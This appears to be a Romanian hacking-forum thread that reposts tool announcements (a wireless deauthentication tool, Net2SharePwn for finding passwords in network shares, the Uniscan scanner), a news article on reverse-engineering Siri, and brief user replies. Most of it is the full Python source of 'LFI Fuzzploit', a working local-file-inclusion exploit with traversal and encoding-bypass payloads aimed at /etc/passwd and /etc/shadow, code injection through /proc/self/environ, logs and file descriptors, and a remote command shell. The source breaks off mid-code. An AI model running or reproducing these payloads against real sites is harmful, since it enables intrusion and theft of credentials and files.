HWK Wireless Auditing Tool 0.3.2 Authored by atzeton | Site nullsecurity.net hwk is an easy-to-use wireless authentication and deauthentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. Download: http://packetstormsecurity.org/files/download/106992/hwk_0.3.2.tar.gz

Hackers port iPhone 4S's Siri to rival devices By Dan Goodin in San Francisco Posted in Mobile, 15th November 2011 00:19 GMT Hackers say they've reverse engineered the Siri personal assistant that debuted in last month's release of the iPhone 4S, a feat that allows them to make it work from virtually any device. To back up their claim, the hackers – from the mobile-application developer Applidium – released a collection of tools on Monday that they say can be used to build Siri-enabled applications on devices that were never authorized to offer the proprietary Apple feature. The tools, written in the Ruby, C, and Objective-C languages, are the result of painstaking sleuthing into the way Siri communicates with a remote server Apple dedicates to the service. "Today, we managed to crack open Siri's protocol," the Applidium developers wrote in a blog post. "As a result, we are able to use Siri's recognition engine from any device. Yes, that means anyone could now write an Android app that uses the real Siri! Or use Siri on an iPad!" The chances of someone using the findings to mass produce a Siri app for unauthorized devices is slim, since the hack requires a valid iPhone 4S unique identifier to be sent to the server. That means Apple could easily revoke identifiers that are used an abnormally high number of times, or from an abnormally high number of different locations. But there doesn't appear to be anything stopping individual iPhone 4S owners from using the hack to expand the number of devices that work with Apple's proprietary natural-language app. The Applidium developers reverse engineered Siri by setting up their own HTTPS servers with an SSL, or secure sockets layer, certificate they signed themselves. That allowed them to observe the commands Siri sent to Apple's server, which is located at guzzoni.apple.com. They eventually found that the body of such requests is little more than a binary plist whose contents can be deciphered using the Mac OS X plutil tool. Interestingly, Siri sends a huge amount of data to the Apple server, and it uses the Speex audio codec to compress raw audio data before it is transmitted. When Siri operates in text-to-speech mode, Apple's server applies a confidence score and time stamp to each word. iPhone fans who are excited by the possibility of this hack are advised to move quickly. Apple has long killed iOS bugs that make jailbreaks possible shortly after they're discovered, so it wouldn't be surprising to see the closing of this hole that allows Siri to be ported to rival devices. Sursa: http://www.theregister.co.uk/2011/11/15/siri_hack/

[Net2SharePwn] - 1.0b JEUDI 10 NOVEMBRE 2011 Net2SharePwn is an utility to check and exploit automatically the NetBIOS Network Shares available from network access points. Question: How do you identify THE FILE containing a password to elevate your network or system privileges, when too much domains or IP addresses are present? The time is an important factor in this situation … and during penetration testing, it’s common to identify a VBS script embedding a domain administrator account password. Answer: Net2SharePwn has been built to allow that. Net2SharePwn is built in Python (tested on Python2.6) and can be launched only on Linux and Mac OS x platforms. I apologize for Python coding, it doesn’t respect the best practices but I didn’t predict to publish Net2SharePwn … Net2SharePwn is perhaps developed “with my feet” but it is functional. You can, if you want to, modify this program to adapt it for your personal usage. Readme (important): http://sud0man.blogspot.com/2011/11/net2sharepwn-10b.html Download: http://dl.dropbox.com/u/31995154/Net2SharePwn-PUB/publication/Net2SharePwn-1.0b/Net2SharePwn-1.0b.tar Sursa: http://sud0man.blogspot.com/2011/11/net2sharepwn-10b.html

Super, are si un manual de folosire elegant. Felicitari!

Uniscan 5.2 is released - vulnerability scanner Uniscan is a open source vulnerability scanner for Web applications. Uniscan 2.0 is a perl vulnerability scanner for RFI, LFI, RCE, XSS and SQL-injection. features: Identification of system pages through a Web Crawler. Use of threads in the crawler. Control the maximum number of requests the crawler. Control of variation of system pages identified by Web Crawler. Control of file extensions that are ignored. Test of pages found via the GET method. Test the forms found via the POST method. Support for SSL requests (HTTPS). Proxy support. Generate site list using Google. Generate site list using Bing. Plug-in support for Crawler. Plug-in support for dynamic tests. Plug-in support for static tests. Plug-in support for stress tests. Tutorials to create your plug-ins: ::: Uniscan :: Project ::: ::: Uniscan :: Project ::: ::: Uniscan :: Project ::: Download: http://sourceforge.net/projects/uniscan/files/5.2/uniscan5.2.tar.gz/download Sursa: Uniscan 5.2 is released - vulnerability scanner ~ The Hacker News | Hacking News | Learn Ethical Hacking Training

Da, stiu de functii, dar asta mi s-a parut banal. Bine, nu l-am incercat, dar speram sa mearga.

Se pot face sugestii pentru posturi pe pagina de FB. Imi dati PM.

LFI Fuzzploit Tool 1.1 Authored by nullbyt3 LFI Fuzzploit is a simple tool to help in the fuzzing for, finding, and exploiting of local file inclusion vulnerabilities in Linux-based PHP applications. Using special encoding and fuzzing techniques, lfi_fuzzploit will scan for some known and some not so known LFI filter bypasses and exploits using some advanced encoding/bypass methods to try to bypass security and achieve its goal which is ultimately, exploiting a local file inclusion. Changes: A bug in the file descriptor scan function is fixed. A command shell bug is fixed. #!/usr/bin/python ##Python Linux LFI expl0iter and Fuzzer for Linux targets ## ##by nullbyt3 ## ##IF you rip, post, or modify please give proper credits to the author ## ########################################################################### ## lfi_fuzzploit is free software: you can redistribute it and/or modify## ## it under the terms of the GNU General Public License as published by ## ## the Free Software Foundation, either version 3 of the License, or ## ## (at your option) any later version. ## ## LFI_Fuzz is distributed in the hope that it will be useful, ## ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## ## along with LFI_fuzzploit. If not, see http://www.gnu.org/licenses/ ## ########################################################################### #Tested on Ubuntu 9.04-11.04, but should work on Windows with the proper modules import urllib,urllib2,sys,os,base64 def main(): banner() usage() logs = ["apache/logs/error.log","apache/logs/access.log","apache/logs/error.log","apache/logs/access.log","apache/logs/error.log","apache/logs/access.log", "etc/httpd/logs/acces_log","etc/httpd/logs/acces.log","etc/httpd/logs/error_log","etc/httpd/logs/error.log","var/www/logs/access_log","var/www/logs/access.log", "usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","var/log/apache/access_log","var/log/apache2/access_log","var/log/apache/access.log", "var/log/apache2/access.log", "var/log/access_log", "var/log/access.log","var/www/logs/error_log","var/www/logs/error.log","usr/local/apache/logs/error_log", "usr/local/apache/logs/error.log","var/log/apache/error_log","var/log/apache2/error_log","var/log/apache/error.log","var/log/apache2/error.log", "var/log/error_log","var/log/error.log"] fuzzer=["../","../../../../../../../../../../../../etc/hosts","../../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../etc/shadow","..\%20\..\%20\..\%20\../etc/passwd","..\..\..\..\..\..\..\..\..\..\etc\passwd", "....//....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/hosts", "..\..\..\..\..\..\..\..\..\..\etc\group",".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd",".\\./.\\./.\\./.\\./.\\./.\\./etc/shadow", "/","../%00/","/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..", "../%2A","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","..//..//..//..//..//../etc/passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group","..//..//..//..//..//..//..//etc//passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", "/'","/\,%ENV\,/","/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd", "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd","/.../.../.../.../.../%0a", "/../../../../../../../../%2A","/../../../../../../../../../../etc/passwd","..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd", "/../../../../../../../../../../etc/passwd^^","/../../../../../../../../../../etc/group","../\../\../\../\../\../\../\etc/\passwd", "/../../../../../../../../../../etc/shadow^^","/../../../../../../../../bin/id|","...//...//...//...//...//...//etc//passwd", "/..\../..\../..\../..\../..\../..\../etc/passwd","/..\../..\../..\../..\../..\../..\../etc/shadow","../\.../\.../\.../\.../\.../\.../\etc/\passwd", "/./././././././././././etc/passwd","/./././././././././././etc/shadow","/./././././././././././etc/group",".../.../.../.../.../.../etc/passwd", "\.\.\.\.\.\.\.\.\etc\passwd","\.\.\.\.\.\.\.\.\etc\group","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", "/%00//%00//%00//%00//%00/etc/passwd","/%00//%00//%00//%00//%00/etc/passwd","/%00//%00//%00//%00//%00//etc//shadow", "/%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../etc/passwd","/%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../etc/shadow", "..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63","..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c","..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup" "..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd","..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd", "..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd","..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd","..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup", "..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow","..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qf","..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfpasswd", "..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfgroup","..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc/passwd","../\.../\.../\.../\.../\.../\.../etc/passwd", "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/shadow", "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af","..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af", "..%u2215..%u2215..%u2215..%u2215..%u2215","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd", "..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215shadow",".%5c../..%5c/..%c0%9v..%5c.%5c../..%5c/..%c0%9v../", "..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd", "..%255c",".%5c../..%5c","/..%c0%9v../","/..%c0%af../","/..%255c..%255c","/..%c0%af..//..%c0%af..//..%c0%af../", "/..%255c..%255c/..%255c..%255c/..%255c..%255c","..%255c",".%5c../..%5c/..%c0%9v../","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd", "..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216hosts","..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216shadow","./\./\./\./\./\./\./etc/hosts", "../\./\./\./\./\./\./\etc/\passwd","../\./\./\./\./\./\./\proc/\self/\fd/\1","..//..//..//..//..//config.php","..\/..\/..\/..\/config.php", "..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afconfig.php","..%25%35%63..%25%35%63..%25%35%63config.php", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2econfig.php"] lfi_load = ["etc/passwd","etc/group","etc/shadow","proc/cpuinfo","proc/meminfo","proc/self/mounts","proc/self/status","proc/self/stat","proc/self/mounts", "etc/security/access.conf","etc/security/opasswd","etc/snort/snort.conf","etc/ldap/ldap.conf","proc/version","etc/clamav/clamd.conf","etc/ssh/sshd_config", "etc/cups/printers.conf","etc/cups/cupsd.conf.default","etc/inetd.conf","etc/apache2/conf.d","etc/apache2/conf.d/security","etc/samba/dhcp.conf", "etc/samba/dhcp.conf","etc/mysql/conf.d/old_passwords.cnf","etc/X11/xorg.conf","etc/gconf","proc/self/cmdline","etc/dhcp3/dhclient.conf", "etc/irssi.conf","etc/chkrootkit.conf","etc/ufw/sysctl.conf","etc/ufw/ufw.conf","etc/php5/apache2/conf.d","etc/syslog.conf", "etc/snmp/snmpd.conf","share/snmp/snmpd.conf","etc/cvs-cron.conf","proc/self/environ","etc/clamav/freshclam.conf","etc/ca-certificates.conf", "etc/debconf.conf","etc/bash_completion.d/debconf","etc/tor/tor-tsocks.conf","etc/xdg/user-dirs.conf","etc/htdig/htdig.conf", "etc/remastersys.conf","etc/gnome-vfs-2.0/modules/default-modules.conf","etc/gnome-vfs-2.0/modules/extra-modules.conf","etc/gconf", "etc/gconf/gconf.xml.defaults","etc/gconf/gconf.xml.defaults/%gconf-tree.xml","etc/tor/tor-tsocks.conf","etc/xdg/user-dirs.conf","etc/htdig/htdig.conf", "etc/remastersys.conf","etc/gnome-vfs-2.0/modules/default-modules.conf","etc/gconf/gconf.xml.defaults","etc/gconf/2","etc/mysql/conf.d", "etc/gconf/gconf.xml.defaults/%gconf-tree.xml","etc/gconf/gconf.xml.system","etc/gconf/2/evoldap.conf","etc/gconf/2/path","etc/gconf/gconf.xml.mandatory", "etc/gconf/gconf.xml.mandatory/%gconf-tree.xml","etc/modprobe.d/vmware-tools.conf","etc/fonts/conf.d","etc/fonts/conf.d/README","etc/miredo.conf" "etc/bluetooth/input.conf","etc/bluetooth/network.conf","etc/bluetooth/main.conf","etc/bluetooth/rfcomm.conf","etc/ldap/ldap.conf","etc/cups/pdftops.conf", "etc/cups/cupsd.conf.default","etc/cups/acroread.conf","etc/cups/cupsd.conf","etc/oinkmaster.conf","etc/menu-methods/menu.config","etc/security/time.conf", "etc/security/namespace.conf","etc/security/sepermit.conf","etc/security/limits.conf","etc/security/group.conf","etc/security/pam_env.conf","etc/deluser.conf", "etc/miredo-server.conf",".etc/mail/sendmail.conf","etc/belocs/locale-gen.conf","etc/snort/threshold.conf","etc/snort/rules/open-test.conf", "etc/snort/rules/emerging.conf","etc/snort/snort-mysql.conf","etc/snort/reference.config","etc/arpalert/arpalert.conf","etc/udev/udev.conf","etc/resolvconf", "etc/resolvconf/update-libc.d","etc/resolvconf/update-libc.d/sendmail","etc/airoscript.conf","etc/foremost.conf","etc/scrollkeeper.conf","etc/pam.conf", "etc/nsswitch.conf","etc/initramfs-tools/conf.d","etc/GeoIP.conf.default","etc/proxychains.conf","etc/host.conf","etc/tinyproxy/tinyproxy.conf", "etc/freetds/freetds.conf","etc/prelude/default/global.conf","etc/prelude/default/idmef-client.conf","etc/prelude/default/tls.conf","etc/apache2/httpd.conf", "etc/apache2/conf.d","etc/apache2/conf.d/charset","etc/apache2/mods-enabled/deflate.conf","etc/apache2/ports.conf","etc/apache2/mods-enabled/mime.conf", "etc/apache2/mods-enabled/dir.conf","etc/apache2/mods-enabled/alias.conf","etc/apache2/mods-enabled/php5.conf","etc/apache2/mods-enabled/negotiation.conf", "etc/apache2/mods-enabled/status.conf","etc/apache2/mods-available/proxy.conf","etc/apache2/mods-available/deflate.conf","etc/apache2/mods-available/mime.conf", "etc/apache2/mods-available/dir.conf","etc/apache2/mods-available/mem_cache.conf","etc/apache2/mods-available/ssl.conf","etc/apache2/mods-available/autoindex.conf", "etc/apache2/mods-available/setenvif.conf","etc/updatedb.conf","etc/kernel-pkg.conf","etc/samba/dhcp.conf","etc/samba/smb.conf","etc/ltrace.conf", "etc/bonobo-activation/bonobo-activation-config.xml","etc/sysctl.conf","etc/mono/config","etc/mono/2.0/machine.config","etc/mono/2.0/web.config", "etc/mono/1.0/machine.config","etc/sensors.conf","etc/X11/xorg.conf-vesa","etc/X11/xorg.conf.BeforeVMwareToolsInstall","etc/X11/xorg.conf", "etc/X11/xorg.conf-vmware","etc/X11/xorg.conf.orig","etc/smi.conf","etc/postgresql-common/autovacuum.conf","etc/pulse/client.conf","etc/python/debian_config", "etc/hdparm.conf","etc/discover.conf.d","etc/discover.conf.d/00discover","etc/casper.conf","etc/discover-modprobe.conf","etc/updatedb.conf.BeforeVMwareToolsInstall", "etc/apt/apt.conf.d","etc/apt/apt.conf.d/00trustcdrom","etc/apt/apt.conf.d/70debconf","etc/apt/apt.conf.d/05aptitude","etc/apt/apt.conf.d/50unattended-upgrades", "etc/apt/apt.conf.d/01ubuntu","etc/apt/apt.conf.d/01autoremove","etc/vmware-tools/config","etc/vmware-tools/vmware-tools-libraries.conf","etc/vmware-tools/tpvmlp.conf", "etc/miredo/miredo.conf","etc/miredo/miredo-server.conf","etc/PolicyKit/PolicyKit.conf","etc/gtk-2.0/im-multipress.conf","etc/resolv.conf","etc/adduser.conf", "etc/subversion/config","etc/openvpn/update-resolv-conf","etc/cvs-pserver.conf","etc/pear/pear.conf","etc/dns2tcpd.conf","etc/java-6-sun/fontconfig.properties", "etc/privoxy/config","etc/gre.d/1.9.0.14.system.conf","etc/gre.d/1.9.0.15.system.conf","etc/gre.d/1.9.0.10.system.conf","etc/logrotate.conf", "etc/skel/.kde3/share/apps/kconf_update","etc/skel/.kde3/share/apps/kconf_update/log/update.log","etc/skel/.kde3/share/share/apps/kconf_update", "etc/skel/.kde3/share/share/apps/kconf_update/log","etc/skel/.kde3/share/share/apps/kconf_update/log/update.log","etc/skel/.config","etc/skel/.config/Trolltech.conf", "etc/skel/.config/menus","etc/skel/.config/menus/applications-kmenuedit.menu","etc/skel/.config/user-dirs.locale","etc/skel/.config/codef00.com", "etc/skel/.config/user-dirs.dirs","etc/avahi/avahi-daemon.conf","etc/dhcp3/dhcpd.conf","etc/dhcp3/dhclient.conf","etc/splashy/config.xml","etc/reader.conf.old", "etc/defoma/config","etc/defoma/config/x-ttcidfont-conf.conf2","etc/wicd/manager-settings.conf","etc/wicd/wireless-settings.conf","etc/wicd/dhclient.conf.template.default", "etc/wicd/wired-settings.conf","etc/sysctl.d/wine.sysctl.conf","etc/sysctl.d/10-network-security.conf","etc/sysctl.d/10-console-messages.conf","etc/kbd/config", "etc/sysctl.d/10-process-security.conf","etc/w3m/config","etc/reader.conf.d","etc/reader.conf.d/libccidtwin","etc/reader.conf.d/0comments","etc/reader.conf", "etc/kbd/config","etc/dbus-1/session.conf","etc/dbus-1/system.conf","etc/etter.conf","etc/pm/config.d","etc/pm/config.d/00sleep_module","etc/depmod.d/ubuntu.conf", "etc/unicornscan/payloads.conf","etc/unicornscan/unicorn.conf","etc/unicornscan/modules.conf","etc/console-tools/config.d","etc/console-tools/config.d/splashy", "etc/tpvmlp.conf","etc/mtools.conf","etc/kernel-img.conf","etc/ca-certificates.conf.dpkg-old","etc/ld.so.conf","etc/conky/conky.conf","etc/ucf.conf","etc/rinetd.conf", "etc/e2fsck.conf","etc/gdm/failsafeDexconf","etc/foomatic/filter.conf","etc/manpath.config","etc/esound/esd.conf","etc/tsocks.conf","etc/stunnel/stunnel.conf", "etc/fuse.conf","etc/uniconf.conf","etc/syslog.conf","etc/cvs-cron.conf","etc/snmp/snmpd.conf","share/snmp/snmpd.conf","/etc/apache2/envvars","config.php"] fd_lfis=["proc/self/fd/0","proc/self/fd/1","proc/self/fd/2","proc/self/fd/3","proc/self/fd/4","proc/self/fd/5","proc/self/fd/6","proc/self/fd/7","proc/self/fd/8", "proc/self/fd/9","proc/self/fd/10","/proc/self/fd/11","/proc/self/fd/12","/proc/self/fd/13","/proc/self/fd/14","/proc/self/fd/15"] step = "../../../../../../../../" evasion = "%00.php" evasion1 = "%00.php.inc" evasion2 = "%00.php5" evasion3 = "%00.phtml" nullbyte ="%00" htmlfile = "lfi_fuzz.html" htmlfile2 = "lfi_fuzz-01.html" htmlfile3 = "lfi_fuzz-02.html" scan_options = ("1)Fuzz for LFI and Directory Transveral?","2)Traditional Local File Inclusion scan and dump?","3)File Descriptor LFI scan?", "4)Exploit LFI via /proc/self/environ","5)Exploit LFI via File descriptor?","6)Include known apache logs","7)Exploit LFI via Logfile?", "8)Use LFI_Sploit\'s LFI command shell","9)Use php:// to read file streams?(allow_url_include must be on)","10)Custom step?(../../)","11)Help?", "12)Exit Prog?") for scan in scan_options: print(scan) option = str(raw_input("Please pick an option(1-12):")) ###########################################################################Start the scan########################################################################## if option == "1": url = str(raw_input("Site and uri to Fuzz: ")) if url[:7] != "http://": url = "http://"+url else: url = url try: cleanup(htmlfile) cleanup(htmlfile2) cleanup(htmlfile3) print "Old files removed, ready to start a new scan" except: print "Ready to start a new scan.." nullorno = str(raw_input("Fuzz with nullbyte and other evasion techniques?(y or n):")) nullorno = nullorno.lower() if nullorno == 'y': for fuzz in fuzzer: myurl = url + fuzz + nullbyte print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print "Error codes: %s" %(e) except KeyboardInterrupt: print "Bye :)" sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion1 print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion2 print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile2) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion3 print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile3) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'n': for fuzz in fuzzer: myurl = url + fuzz print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print "Error: %s" %(e) except KeyboardInterrupt: print "Bye :)" sys.exit(1) elif option == "2": htmlfile = "LFI_report.html" url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print "cleaning up old files before starting a scan" try: cleanup(htmlfile) print "Old files removed, ready to start a new scan" except: print "Ready to start a new scan.." nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': for lfi in lfi_load: myurl = url + step + lfi print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error Codes including files: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': for lfi in lfi_load: myurl = url + step + lfi + nullbyte print("Scanning %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "3": htmlfile = "LFI_FD_report.html" htmlfile2 = "LFI_FD_report1.html" htmlfile3 = "LFI_FD_report2.html" url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print "cleaning up old files before starting to scan" try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': for fd in fd_lfis: myurl = url + step + fd print("Attempting to include file descriptor and url: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': for fd in fd_lfis: myurl = url + step + fd print("Scanning %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error code: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "4": url = str(raw_input("Site and uri to exploit(/proc/self/environ must be viewable and magic_quotes=off)?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print "cleaning up old files before starting a scan" try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': environ = "../../../../../../../../../proc/self/environ" myurl = url + environ print("Injecting code into /proc/self/environ using site: %s" %(myurl)) try: exploit_environ(myurl) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': environ = "../../../../../../../../proc/self/environ" myurl = url + environ + nullbyte print("Injecting code into /proc/self/environ on url: %s" %(myurl)) try: exploit_environ(myurl) except IOError as e: print("Error codes connecting to server: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "5": url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url fds = {"1": "../../../../../../../proc/self/fd/1","2":"../../../../../../../proc/self/fd/2", "3":"../../../../../../../proc/self/fd/3","4":"../../../../../../../proc/self/fd/4", "5":"../../../../../../../proc/self/fd/5","6":"../../../../../../../proc/self/fd/6", "7":"../../../../../../../proc/self/fd/7","8":"../../../../../../../proc/self/fd/8", "9":"../../../../../../../proc/self/fd/9","10":"../../../../../../../proc/self/fd/10", "11":"../../../../../../../proc/self/fd/11","12":"../../../../../../proc/self/fd/12"} fd = str(raw_input("File descriptor number to log for shell include?:(ie 1-12)")) print("cleaning up old files before starting a scan") try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': myurl = url + fds[fd] print("Injecting code into file descriptor: %s" %(myurl)) try: exploit_lfi(myurl) except IOError as e: print("Error codes connecting to server: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': myurl = url + fds[fd] + nullbyte print("Injecting code into file descriptor: %s" %(myurl)) try: exploit_lfi(myurl) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: option_error() elif option == "6": url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print("Cleaning up old html files") try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': for log in logs: myurl = url + step + log print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': for log in logs: myurl = url + step + log print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: option_error() sys.exit(1) elif option == "7": print("\n\n1)Inject code in a specific Log?") print("2)Include all logs and inject code(a LFI hail mary(very noisy!))?: ") what_to_do = str(raw_input("Option:")) if what_to_do == "1": url = str(raw_input("Site were working with: ")) if url[:7] != "http://": url = "http://"+url else: url = url logfile = str(raw_input("Logfile to inject code into?: ")) null = str(raw_input("Add a nullbyte(y or n):" )) if null == "n": myurl = url + step + logfile print("Attempting to inject code into logfile: %s" %(logfile) ) try: exploit_lfi(myurl) except IOError as e: print("Error injecting code into %s\n ERROR: %s" %(logfile, e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif null == "y": myurl = url + step + logfile + null print("Attempting to inject code into logfile: %s" %(logfile) ) try: exploit_lfi(myurl) except IOError as e: print("Error injecting code into %s\n ERROR: %s" %(logfile, e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: option_error() sys.exit(1) if what_to_do == "2": warn = str(raw_input("Warning: This is a noisy scan that makes alot of requests,exit?(y or n)")) if warn == "y": sys.exit(1) elif warn == "n": url = str(raw_input("Site were working with: ")) if url[:7] != "http://": url = "http://"+url else: url = url null = str(raw_input("Add a nullbyte(y or n):" )) if null == "n": for log in logs: myurl = url + step + log print("Attempting to inject code into logfile: %s" %(log)) try: exploit_lfi(myurl) except IOError as e: print("Error injecting code into %s\n ERROR: %s" %(log, e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: pass elif option == "8": os.system('clear') print("+==+==+==+==+==+[+]OS Environ/FD/Logfile Shell environment[+]==+==+==+==+==+\n\n") url = str(raw_input("Fully Exploited url?: ")) if url[:7] != "http://": url = "http://"+url else: url = url while 1: try: command_shell(url) except IOError as e: print("Error executing command. Code: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "9": b64file = "b64_encoded_stream.txt" print "Warning: allow_url_include must be enabled for this attack to succeed!" url = str(raw_input("Url to exploit?: ")) if url[:7] != "http://": url = "http://"+url else: url = url read = str(raw_input("PHP File to attempt to read or include(ie config.php)")) sploit = "php://filter/convert.base64-encode/resource=" myurl = url + sploit + read try: req = urllib2.Request(myurl) req.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) pointer = response with open(htmlfile , 'a') as PHPOBJ: PHPOBJ.writelines("<b>PHPStream url: %s</b>" %(myurl)) PHPOBJ.writelines(pointer) if PHPOBJ.writelines(pointer): B64.b64decode(pointer) print("Decoded Base 64 streams have been written to %s" %(b64file)) else: pass except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "10": htmlfile = "LFI_fuzz_custom.html" url = str(raw_input("Site to scan: ")) if url[:7] != "http://": url = "http://"+url else: url = url print("Cleaning up old html files") try: cleanup(htmlfile) print("Old files 